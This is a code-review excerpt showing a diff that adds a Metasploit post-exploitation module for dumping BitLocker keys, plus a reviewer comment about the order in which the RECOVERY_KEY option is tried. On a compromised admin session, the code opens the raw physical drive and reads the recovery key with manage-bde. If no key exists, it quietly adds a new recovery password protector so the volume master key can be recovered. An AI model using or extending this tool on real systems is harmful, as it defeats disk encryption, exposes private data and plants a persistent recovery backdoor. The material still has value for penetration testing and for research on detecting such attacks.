modules/post/windows/gather/bitlocker_fvek.rb

```diff
@@ -0,0 +1,143 @@
+        ['URL', 'http://www.hsc.fr/ressources/outils/dislocker/']
+      ]
+    ))
+
+    register_options(
+      [
+        OptString.new('DRIVE_LETTER', [true, 'Dump informations from the DRIVE_LETTER encrypted with Bitlocker', nil]),
+        OptString.new('RECOVERY_KEY', [false, 'Use the recovery key provided to decrypt the Bitlocker master key (FVEK)', nil])
+      ], self.class)
+  end
+
+  def run
+    file_path = session.sys.config.getenv('windir') << '\\system32\\win32k.sys'
+    major, minor, _build, _revision, _branch = file_version(file_path)
+    winver = (major.to_s + '.' + minor.to_s).to_f
+
+    fail_with(Failure::NoTarget, 'Module not valid for OS older that Windows 7') if winver <= 6
+    fail_with(Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
+
+    drive_letter = datastore['DRIVE_LETTER']
+    system_root = expand_path('%SYSTEMROOT%')
+
+    cmd_out = cmd_exec('wmic', "logicaldisk #{drive_letter}: ASSOC:list /assocclass:Win32_LogicalDiskToPartition")
+
+    @starting_offset = cmd_out.match(/StartingOffset=(\d+)/)[1].to_i
+
+    drive_number = cmd_out.match(/DiskIndex=(\d+)/)[1]
+
+    r = client.railgun.kernel32.CreateFileW("\\\\.\\PhysicalDrive#{drive_number}",
+                                            'GENERIC_READ',
+                                            'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
+                                            nil,
+                                            'OPEN_EXISTING',
+                                            'FILE_FLAG_WRITE_THROUGH',
+                                            0)
+
+    if r['GetLastError'] != ERROR::SUCCESS
+      fail_with(Failure::Unknown,
+        "Error opening #{drive_letter}. Windows Error Code: #{r['GetLastError']}
+         - #{r['ErrorMessage']}")
+    end
+
+    @handle = r['return']
+    print_good("Successfuly opened Disk #{drive_number}")
+    seek_relative_volume(0)
+
+    print_status('Trying to gather a recovery key')
+
+    cmd_out = cmd_exec("#{system_root}\\sysnative\\manage-bde.exe",
+                       "-protectors -get #{drive_letter}:")
+
+    recovery_key = cmd_out.match(/((\d{6}-){7}\d{6})/)
+
+    if !recovery_key.nil?
+      recovery_key = recovery_key[1]
+      print_good("Recovery key found : #{recovery_key}")
+    else
+      print_status('No recovery key found, trying to generate a new recovery key')
+      cmd_out = cmd_exec("#{system_root}\\sysnative\\manage-bde.exe",
+                         "-protectors -add #{drive_letter}: -RecoveryPassword")
+      recovery_key = cmd_out.match(/((\d{6}-){7}\d{6})/)
+      id_key_tmp = cmd_out.match(/(\{[^\}]+\})/)
+      if !recovery_key.nil?
+        recovery_key = recovery_key[1]
+        id_key_tmp = id_key_tmp[1]
+        print_good("Recovery key generated successfuly : #{recovery_key}")
+      else
+        print_status('Recovery Key generation failed')
+        if !datastore['RECOVERY_KEY'].nil?
```

Comment:
Perhaps I am misunderstanding this larger `if/else` block, but IMO, if they specified `RECOVER_KEY`, shouldn't that be the first and perhaps only method that is tried?  IOW, if they specify `RECOVERY_KEY`, try that and that only, otherwise try to get it using the other two methods involving `manage_bde.exe`